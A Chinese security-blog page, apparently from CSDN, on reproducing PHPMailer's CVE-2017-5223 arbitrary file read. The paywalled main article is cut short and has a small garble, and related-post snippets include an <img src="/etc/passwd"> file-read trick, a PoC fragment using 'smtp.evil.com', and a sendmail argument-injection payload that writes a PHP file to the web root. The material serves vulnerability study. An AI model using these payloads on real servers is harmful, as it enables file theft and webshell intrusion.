PHPMailer 任意文件读取漏洞(CVE-2017-5223)复现

最新推荐文章于 2026-05-08 11:11:15 发布
原创 最新推荐文章于 2026-05-08 11:11:15 发布 · 1.9k 阅读 · 0
标签
#PHPMailer #任意文件读取 #cve
本文详细介绍了PHPMailer的CVE-2017-5223任意文件读取漏洞,包括漏洞概述、受影响的版本、复现步骤以及修复方案。攻击者可通过控制邮件中的图片src属性来读取服务器上的任意文件,如通过POC触发读取/etc/passwd。为防止此类攻击,建议及时将PHPMailer升级到5.2.21及以上版本。

PHPMailer 任意文件读取漏洞(CVE-2017-5223)复现

  • 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切.

漏洞概述:

  • PHPMailer之前还有一个远程命令执行,闪现这次主要是由于PHPMailer在发送邮件的时,由于函数中接收了一个 p a t h 变 量 , 最 后 讲 path变量,最后讲 pathpath变量的值带入到了file_get_c
最低0.47元/天 解锁文章
PHPMailer 任意文件读取漏洞 CVE-2017-5223 漏洞复现
ADummy的博客
02-26 1472
PHPMailer 任意文件读取漏洞CVE-2017-5223) by ADummy 0x00利用路线 ​ 注册邮箱—>配置环境—>插入恶意代码—>目标服务器发送邮件—>服务器文件被读出 0x01漏洞介绍 ​ PHPMailer在发送邮件的过程中,会在邮件内容中寻找图片标签(<img src="...">),并将其src属性的值提取出来作为附件。所以,如果我们能控制部分邮件内容,可以利用<img src="/etc/passwd">将文件/etc/p
PHPMailer 任意文件读取漏洞
帅醉了的博客
11-20 621
CVE-2017-5223 POC <?php # Author:Yxlink require_once('PHPMailerAutoload.php'); $mail = new PHPMailer(); $mail->IsSMTP(); $mail->Host = "smtp.evil.com"; $mail->Port = 25; $mail->SMTPAuth = true; $mail->CharSet = "UTF-8"; $mail->E
php查看邮件漏洞,PHPMailer任意文件读取漏洞分析(CVE-2017-5223
weixin_42327291的博客
03-11 619
原标题:PHPMailer任意文件读取漏洞分析(CVE-2017-5223)PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发现PHPMailer <= 5.2.21版本存在任意文件读取漏洞,成功利用该漏洞,可获取服务器中的任意文件内容。目...
CVE-2026-22218 Chainlit 框架任意文件读取漏洞全解析
最新发布
蚁景网安学院
05-08 499
Chainlit 在处理自定义元素(Custom Element)时,没有对用户传入的文件路径做任何验证,也没有对未认证用户进行有效拦截,导致任意人都可以让服务器读取其本地任意文件并通过接口返回给攻击者。
PHPMailer 任意文件读取漏洞CVE-2017-5223
EC_Carrot的博客
07-20 889
漏洞详细 PHPMailer在发送邮件的过程中,会在邮件内容中寻找图片标签,即<img>,并将其src属性的值提取出来作为附件。 所以,如果我们能控制部分邮件内容,可以利用将文件/etc/passwd作为附件读取出来。 原理参考:https://www.seebug.org/vuldb/ssvid-92617 影响范围 PHPMailer < 5.2.21 漏洞复现 我环境启动不了,但是我会根据vulhub的实战文章讲讲。 在“意见反馈”页面,正常用户填写昵称、邮箱、意见提交,后端会返回
CVE漏洞复现-CVE-2016-10033-远程命令执行
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-28 2538
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。CVE-2016-10033是PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。:小于 5.2.18 版本。
【WEB攻防】WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033) 安鸾靶场详细复现 -WordPress1
AAAAAAAAAAAA66的博客
01-04 2486
中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 漏洞简介 工具 题
PHPMailer命令执行及任意文件读取漏洞
02-10 2018
  今天在thinkphp官网闲逛,无意下载了一套eduaskcms,查看了一下libs目录中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer漏洞,可惜这套CMS只提供了一个邮箱接口,前台页面需要单独自己写,没办法用这套CMS进行复现,这边也顺便利用这个PHPMailer-5.2.13对CVE-2016-10033和CVE-2017-5223进行本地复现,记录一下。 ...
PHPMailer < 5.2.21 - Local File Disclosure(CVE-2017-5223
weixin_30888413的博客
11-10 257
    CVE-2017-5223PHPMailer < 5.2.21 - Local File Disclosure   本文主要介绍一下PHPMailer < 5.2.21 - Local File Disclosure漏洞的环境搭建和利用,关于漏洞的描述请参考下面的第二个链接。 环境搭建 说明   这里用到的邮件服务器是自己本地搭建的邮件服务器,我感觉其实也是可以用...
php查看邮件漏洞,()PHPMailer任意文件读取漏洞分析(CVE-2017-5223
weixin_39529914的博客
03-11 416
*本文原创作者:Yxlink,本文属FreeBuf原创奖励计划,未经许可禁止转载PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发现PHPMailer<=5.2.21版本存在任意文件读取漏洞,成功利用该漏洞,可获取服务器中的任意文件内容。...
PHPMailer远程命令执行漏洞复现
小小猪的博客
12-13 2162
PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。 影响版本: PHPMailer<5.2.18 环境搭建: 这里采用现成靶机 漏洞复现: aaa "aaa". -O
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
热门推荐
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
记一次Mailpress插件RCE漏洞复现
qq_42562304的博客
07-26 912
WordPressMailpressPlugin插件中,文件中iview()函数中subject参数未经过滤,直接拼接do_eval函数执行代码,而do_eval函数也未经任何过滤,导致远程代码执行漏洞。详情链接。
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 9993
文件读取漏洞,文件下载漏洞,文件包含漏洞三者结合,靶场练习
PHPMailer远程命令执行漏洞溯源
2303_76679642的博客
08-29 844
步骤3:burp抓包,更改email处payload为"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com 更改message处payload为<?PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)步骤1:进入靶场,利用bp抓包,发现与后台交互的文件。步骤2:进入之后看到下面的页面,很明显是一个功能点。
漏洞情报 | PHPMailer 多个远程代码执行漏洞
爱国小白帽
06-18 844
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 PHPMailer是一个用于发送电子邮件的PHP类库。 2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。 CVE-2021-3603:该该漏洞
WordPress4.6命令执行漏洞CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 4756
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行的
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值